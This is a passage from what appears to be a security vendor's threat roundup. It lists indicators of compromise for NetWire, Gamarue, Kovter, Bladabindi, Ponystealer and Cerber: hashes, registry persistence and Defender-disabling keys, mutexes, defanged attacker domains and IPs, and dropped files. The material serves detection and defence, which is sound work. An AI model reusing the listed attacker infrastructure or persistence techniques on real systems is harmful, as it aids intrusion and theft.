                007e9d94f91258cdc60ba3fd7df1ed56b00c7c08ecff19c484343ce95978c096 068f1532a0c7e9f564e92f9b093f4cf4a534ef9aa6ee0e6ec6b992beba9404f1 09edeec6283a7986081aeaa4715321a383d675dbfbd2486d01b7e5c9fd81dfc6 0a324fcc5e761067096e9f2161ce3da69c0836972cda72e8740532cc7e84866a 0b19441ced2510b94d977feac51406e3e2a9b9b68f6e8df7a8710c9df29ec8d9 0fe8b3586aa6098767690b4ee1b1fbb39d047fcd7a929d2726f634365eacc6a8 13a865d3702b86db5c13bf6190a03da070ca23c094f8d3c2818ef788655b695b 14fa94928f23ccdb90400c7628327649543d9fd9dae6e963b8c1d96e0ebf7699 184c8d777fe98828143da4f2d762d094475a5eaa9018f77a97e8aad7d5cc696d 1ee8f3dec5556746589f417e1553a7c5f63eca1bab55d5ec95a96feb5ceb7c20 24ce27efe076795d16b9530988cf7b66df89b1f5e1c170a43c509f19b7ca1f94 2870225c01ab904fc4c9a1c7130c88dc4269cb34ff1d3aa3a225d1a9ff53f6ac 29346d7f7895e449a9b09135e2c05deddfddbe9db62db4eb8d33f8f458b13e7a 2b30cd5e49572f0ec94855d7d64ebb4ccfb89c0e2ce0804010a36b892a0e2d3d 2bab0171d0bcbb1be86ef7ea26aa76a10155978a84c08214b156e837a024372a 34e46ae12096f2a6f3aa9ccc9d59cb94ff0ef151da405f056f43b3b2eb9781b5 3c4bad8514148748ac20c348ad75e47633ee2723db56fb993503719390eeca75 3d9acac16267698fb1f3ac47d0d05a2dda4c4758e9b36c9e1644f89e041556ba 42a29cd7a6ce5a5f864a99968f85e7cb4b8d22383b7e194cfd0d558e463c7b70 46cad7db43d81067d78055680a8434ccf1090e3afbc52654ba4dd905038c7a9a 492425d2ab26c3d88845c3d3ee8c13cd7bef8fc893ec71f61881bd1cde33f358 499a4b0530fcff51c3f8703e727ba8fee36c19229be9a650cd5b7dad1d184a79 4cca83ef698b44352c95dc6b05dbaa1eca0521454179932bb4d8094c01133bfb 4d2be228e84f31aade8e7be4c37e05921e3f94297b2a45fe7fa2ca61d5e8dfbd 4d678fc86bacc1f3c53f7b96c814710a5029306be44a90d32c482719ff308b45
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSAThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Dropper.NetWire-7578556-0

                Indicators of Compromise

                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                88[.]198[.]117[.]8325

                File Hashes

                05848831206819b63dabd2116e673d28de675e62cf7d858fa4764bfc7a1e9b40 1504dfb0c30dd51fed5c8940d5103479ae565fba3d839f7d973925fa868a6097 17e436f6312f5cb021419beabb8985272593995ccc09110f27abfee1d1eed74e 18bb29e7f9fcc8410d0e613a4989d47b5f1b38023c26bb95a4fe5ae53c2f52ff 1a996582f6a9e60acc72d4266067c9e5ff48ac32bdb45fc8787cc366ff4bd790 27540988f360e65aa1ca42007c551fb73ab1b36ed5408ff098389b6ce3ac0f94 27fb4531c6056a49b297b20a24eafaceabb954aeb24dc00813e85884e2d0a5ce 2ace0152ad8eb298bcae92ebcf3c27c09ed25620c59642be684886bffee56ccb 3c1c1ccf871e10907e69945363ada929b5841d4d192a8422745c47731d33bcfd 3efa7242e48e0be611c350de170776f8537fec4e7c0105ec86e44a18e95db367 46988782ad1012c66e2de02140c2f5d4f210916b0ace64d5c29018336ba76668 4b8c0fcde33aedb55f6e087fd9526699f188f3e3030e33bd04cd8785b748ebe1 4e9562ec338b3e4dbaca5f30289881689f5e4ca5ef7fffb4afe73abe040213b2 5609f2f063ee870c77bfb1e2912d7d5080f85755e069a67c94a6258bebe5f367 5f446e1da31fd31ec83cb6fa2b26da3ae2821ca60273152079736006f498841e 610007b784ce5e7ffa2a2e646e60c72277a0222b2f18fb74eed55d25f1af37dc 6253c1a4ebbfba5de561219996ddc45af59f4ca3b35a3f95354f5ae91c78bbe0 68a0b82d1b3a21dcbd78de0bdb31f69e4afdb4c20750929d9959af168aa4457d 74a0bc89f2667f79264105d44c751d625fbc53ce5a12771134b9c32ca9e916c9 74b44c73bf6f45344bb4aef9f469b3ca92b76b6c0e479e126cab0e35f679c9ca 7caee05382db7f0819893217db61a70cb249d1de1530fedf80e56a9fabc445d6 7e00eca478b68881e4722e2aba2094e468b4b457515d4b8e247b624189ecfc65 8851b44b9e92689115050278bef0261926ecda761a19a566a73fa29de08bad69 89c33a22731e48e90417e2877e318c86a7ac57b5d9ba4c9a39bc65bf27191935 8a9130af590f32b807270517b61af5dbff8f3bc1e2114648f764d8180c22d5c2
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                ThreatGrid




                Win.Packed.Gamarue-7580018-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                Value Name: Hidden
                11
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
                Value Name: ShowSuperHidden
                11
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
                Value Name: Load
                11
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: 1081297374
                11
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: 1081297374
                11
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 11
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: EnableLUA
                9
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
                Value Name: Start
                9
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
                Value Name: Start
                9
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
                Value Name: Start
                9
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
                Value Name: HideSCAHealth
                9
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
                Value Name: HideSCAHealth
                9
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
                Value Name: Start
                9
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
                Value Name: TaskbarNoNotification
                9
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
                Value Name: TaskbarNoNotification
                9
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Sidebars
                2
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: twunk_16.exe
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: Taskman
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: Shell
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Windows Update Manager
                1
                <HKCU>\SOFTWARE\WINRAR
                Value Name: HWID
                1
                <HKCU>\SOFTWARE\WINRAR 1
                <HKCU>\SOFTWARE\MICROSOFT\MODULES 1
                <HKCU>\SOFTWARE\MICROSOFT\MODULES
                Value Name: Number
                1
                <HKCU>\SOFTWARE\MICROSOFT\NOTEPAD
                Value Name: Body
                1
                MutexesOccurrences
                alFSVWJB2
                PuredairyBB91
                PuredairyBB101
                PuredairyBB21
                PuredairyBB41
                PuredairyBB81
                PuredairyBB71
                PuredairyBB61
                PuredairyBB151
                PuredairyBB141
                PuredairyBB131
                PuredairyBB121
                PSPSndkvsdvd01992011
                PuredairyBB11
                PuredairyBB51
                PuredairyBB31
                PuredairyBB161
                PuredairyBB171
                PuredairyBB181
                PuredairyBB221
                PuredairyBB201
                PuredairyBB211
                PuredairyBB191
                PuredairyBB291
                PuredairyBB311
                *See JSON for more IOCs
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                195[.]22[.]26[.]2482
                23[.]253[.]126[.]582
                184[.]105[.]192[.]26
                104[.]239[.]157[.]2102
                104[.]42[.]225[.]1228
                40[.]90[.]247[.]2105
                40[.]91[.]124[.]1114
                20[.]45[.]1[.]1079
                109[.]120[.]180[.]292
                94[.]102[.]52[.]191
                217[.]23[.]8[.]1421
                109[.]236[.]86[.]1191
                93[.]190[.]140[.]1411
                108[.]59[.]2[.]2211
                109[.]236[.]83[.]121
                80[.]82[.]65[.]2071
                217[.]23[.]3[.]1051
                217[.]23[.]4[.]2201
                93[.]190[.]140[.]1131
                217[.]23[.]9[.]1041
                93[.]190[.]142[.]1911
                94[.]102[.]51[.]2311
                217[.]23[.]7[.]31
                80[.]82[.]65[.]1991
                109[.]236[.]86[.]271
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                europe[.]pool[.]ntp[.]org9
                www[.]update[.]microsoft[.]com[.]nsatc[.]net9
                and10[.]uzuzuseubumaandro[.]com1
                powerrembo[.]ru2
                and4[.]junglebeariwtc1[.]com1
                faumoussuperstars[.]ru2
                martivitapoint[.]info1
                and10[.]uzuzuseubumaandro1[.]com1
                spotxte[.]com1
                nutqauytva8azxd[.]com2
                nutqauytva100azxd[.]com2
                nutqauytva2azxd[.]com2
                nutqauytva10azxd[.]com2
                nutqauytva6azxd[.]com2
                nutqauytva11azxd[.]com2
                nutqauytva3azxd[.]com2
                nutqauytva9azxd[.]com2
                nutqauytva7azxd[.]com2
                nutqauytva5azxd[.]com2
                nutqauytva4azxd[.]com2
                109[.]120[.]180[.]291
                vedivenivici[.]ml2
                delvernet[.]info2
                otter[.]pw2
                oingee[.]pw2
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                \Documents and Settings\All Users\mslkrru.exe9
                %APPDATA%\WindowsUpdate1
                \RECYCLER7
                \RECYCLER\S-1-5-21-0243556031-888888379-781862338-186117715
                \TEMP\C\UPDATE1
                %APPDATA%\WindowsUpdate\MSupdate.exe1
                %APPDATA%\alFSVWJB2
                %ProgramData%\msodtyzm.exe11
                \RECYCLER\S-1-5-21-0243556031-888888379-781862338-18617712
                %ProgramData%\~11
                %APPDATA%\alFSVWJB\twunk_16.exe1
                %APPDATA%\winamfes.exe2
                %APPDATA%\alFSVWJB\splwow64.exe1
                %TEMP%\-1631195624.bat1
                %TEMP%\115828.bat1
                %APPDATA%\alFSVWJB\winhlp32.exe1

                File Hashes

                0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca 1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4 1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314 1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6 20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef 2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88 36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f 3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e 5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41 68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470 693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8 6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54 70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae 7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855 7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb 82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce 87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8 966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2 98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6 aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320 bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049 d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6 d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54 da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Trojan.Kovter-7581113-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
                Value Name: DisableOSUpgrade
                15
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
                Value Name: ReservationsAllowed
                15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
                Value Name: 656f27d6
                15
                <HKCU>\SOFTWARE\3A91C13AB1
                Value Name: 656f27d6
                15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
                Value Name: 96f717b3
                15
                <HKCU>\SOFTWARE\3A91C13AB1
                Value Name: 96f717b3
                15
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 15
                <HKCU>\SOFTWARE\3A91C13AB1 15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 15
                <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 15
                <HKCR>\.8CA9D7 15
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: eed5bf47
                15
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: edfc5b63
                15
                <HKCR>\C3B61 15
                <HKCR>\C3B61\SHELL 15
                <HKCR>\C3B61\SHELL\OPEN 15
                <HKCR>\C3B61\SHELL\OPEN\COMMAND 15
                <HKCR>\.8CA9D7 15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
                Value Name: ffcfae7b
                15
                <HKCU>\SOFTWARE\3A91C13AB1
                Value Name: ffcfae7b
                15
                <HKCU>\SOFTWARE\3A91C13AB1
                Value Name: 78758f10
                15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
                Value Name: 78758f10
                15
                <HKCU>\SOFTWARE\3A91C13AB1
                Value Name: c3ab6058
                15
                <HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
                Value Name: c3ab6058
                15
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: 8567f942
                15
                MutexesOccurrences
                EA4EC370D1E573DA15
                A83BAA13F950654C15
                Global\7A7146875A8CDE1E15
                B3E8F6F86CDD9D8B15
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                162[.]59[.]22[.]2161
                203[.]220[.]231[.]2091
                35[.]30[.]2[.]2111
                65[.]168[.]33[.]911
                65[.]23[.]68[.]1931
                8[.]111[.]224[.]1461
                190[.]95[.]112[.]801
                17[.]163[.]64[.]91
                75[.]177[.]69[.]901
                166[.]105[.]213[.]361
                214[.]63[.]237[.]801
                36[.]91[.]76[.]701
                106[.]70[.]177[.]2211
                16[.]191[.]214[.]151
                58[.]13[.]27[.]491
                192[.]86[.]250[.]641
                126[.]167[.]218[.]581
                15[.]150[.]185[.]791
                136[.]59[.]133[.]351
                14[.]24[.]198[.]671
                60[.]255[.]136[.]371
                35[.]118[.]226[.]2141
                39[.]29[.]235[.]491
                154[.]111[.]27[.]1041
                166[.]82[.]242[.]421
                *See JSON for more IOCs
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                www[.]litespeedtech[.]com1
                schema[.]org1
                api[.]w[.]org1
                gmpg[.]org1
                pinterest[.]com1
                httpd[.]apache[.]org1
                bugs[.]debian[.]org1
                www[.]anrdoezrs[.]net1
                shareasale[.]com1
                help[.]smartertools[.]com1
                www[.]smartertools[.]com1
                www[.]pntrs[.]com1
                cdn10[.]bigcommerce[.]com1
                cowgirldelight[.]com1
                lppool[.]catalogsites[.]net1
                www[.]rods[.]com1
                checkspressions[.]com1
                www[.]womensbootshop[.]com1
                www[.]cssigniter[.]com1
                passets-cdn[.]pinterest[.]com1
                www[.]pntra[.]com1
                Files and or directories createdOccurrences
                %LOCALAPPDATA%\4dd3c15
                %LOCALAPPDATA%\4dd3c\519d0.bat15
                %LOCALAPPDATA%\4dd3c\8e986.8ca9d715
                %LOCALAPPDATA%\4dd3c\d95ad.lnk15
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91b4e.lnk15
                %APPDATA%\b08d615
                %APPDATA%\b08d6\0b3c0.8ca9d715

                File Hashes

                0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c 127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a 2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431 2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9 30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2 37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394 7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717 797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c 7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27 82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17 ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037 b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806 b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110 cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                PUA.Win.Trojan.Bladabindi-7581164-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\ENVIRONMENT
                Value Name: SEE_MASK_NOZONECHECKS
                17
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: ParseAutoexec
                17
                <HKCU>\SOFTWARE\7261D3F24AE2C8DCAF22FAF7FCF1CAFD 17
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd
                17
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd
                17
                <HKCU>\SOFTWARE\7261D3F24AE2C8DCAF22FAF7FCF1CAFD
                Value Name: [kl]
                17
                MutexesOccurrences
                qazwsxedc17
                7261d3f24ae2c8dcaf22faf7fcf1cafd17
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                shareefboy[.]ddns[.]net17
                Files and or directories createdOccurrences
                %HOMEPATH%\Start Menu\Programs\Startup\x.vbs16
                %TEMP%\server.exe17
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs16
                \423002248.exex (copy)1
                %TEMP%\server.exex (copy)17

                File Hashes

                00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5 245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714 285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf 29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c 2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd 344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4 388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7 66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e 7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28 8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5 aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757 c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88 d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62 fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WSA N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Packed.Ponystealer-7581286-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\WINRAR
                Value Name: HWID
                17
                <HKCU>\SOFTWARE\WINRAR 17
                <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
                Value Name: F
                17
                <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
                Value Name: F
                17
                <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
                Value Name: F
                17
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                194[.]4[.]56[.]25217
                212[.]129[.]7[.]1311
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                myp0nysite[.]ru17
                streetcode3[.]com1
                Files and or directories createdOccurrences
                %HOMEPATH%\Start Menu\Programs\Startup\filename.vbe1
                %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\filename.vbe17
                %APPDATA%\subfolder17
                %APPDATA%\subfolder\filename.bat17
                %TEMP%\811953.bat1
                %TEMP%\-1509909074.bat1

                File Hashes

                13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5 182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0 2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1 2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772 3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43 5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee 73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6 8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7 8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a 955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d 9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0 ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6 d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174 e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4 e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620

                Coverage

                ProductProtection
                AMPThis has coverage
                Cloudlock N/A
                CWSThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WSAThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Ransomware.Cerber-7582361-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\CONTROL PANEL\DESKTOP
                Value Name: TileWallpaper
                7
                <HKCU>\CONTROL PANEL\DESKTOP
                Value Name: WallpaperStyle
                7
                <HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES
                Value Name: DefaultTokenId
                6
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 6
                <HKCU>\SOFTWARE\MICROSOFT\SPEECH\VOICES 6
                <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                Value Name: PendingFileRenameOperations
                6
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228}
                2
                MutexesOccurrences
                shell.{<random GUID>}8
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                13[.]107[.]21[.]2002
                204[.]79[.]197[.]2003
                15[.]49[.]2[.]0/278
                122[.]1[.]13[.]0/278
                194[.]165[.]17[.]0/258
                95[.]213[.]195[.]1232
                91[.]142[.]90[.]617
                31[.]41[.]47[.]505
                31[.]41[.]47[.]311
                195[.]19[.]192[.]992
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                maxcdn[.]bootstrapcdn[.]com1
                get[.]adobe[.]com4
                en[.]wikipedia[.]org14
                www[.]torproject[.]org7
                www[.]collectionscanada[.]ca7
                alpha3[.]suffolk[.]lib[.]ny[.]us7
                www[.]archives[.]gov7
                www[.]vitalrec[.]com7
                www[.]cdc[.]gov7
                hldsfuh[.]info1
                mmteenijjjuyoqju[.]info1
                ydgsjrjqotlffitfg[.]org1
                dxpmkdipp[.]info1
                cojkhmdxrwvxwxa[.]pw1
                qgilcuym[.]org1
                www[.]multicounter[.]de9
                pqhwfeeivtkxi[.]click5
                othcijmuhwb[.]pl4
                iconhrdqmeueg[.]su2
                cdwguymjxnyot[.]pl3
                veiqvqirdhmyis[.]org4
                qoaouhgwfy[.]biz2
                hkwyfnevdievebgjx[.]xyz2
                ligumssfsrtfpy[.]xyz4
                rqtcmltkurtev[.]pw2
                *See JSON for more IOCs
                Files and or directories createdOccurrences
                %HOMEPATH%\Contacts\Administrator.contact15
                %TEMP%\d19ab989\4710.tmp8
                %TEMP%\d19ab989\a35f.tmp8
                \MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\_14-INSTRUCTION.html7
                \MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\_15-INSTRUCTION.html7
                \MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\_16-INSTRUCTION.html7
                \MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\_17-INSTRUCTION.html7
                \MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\_18-INSTRUCTION.html7
                \MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\_19-INSTRUCTION.html7
                \MSOCache\All Users\{91140000-0011-0000-0000-0000000FF1CE}-C\_20-INSTRUCTION.html7
                %ProgramData%\Adobe\Updater6\_21-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\_22-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\_24-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\_26-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\_25-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\_28-INSTRUCTION.html7
                %ProgramData%\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\_27-INSTRUCTION.html7
                %ProgramData%\Microsoft\IlsCache\_29-INSTRUCTION.html7
                %ProgramData%\Microsoft\Network\Downloader\_46-INSTRUCTION.html7
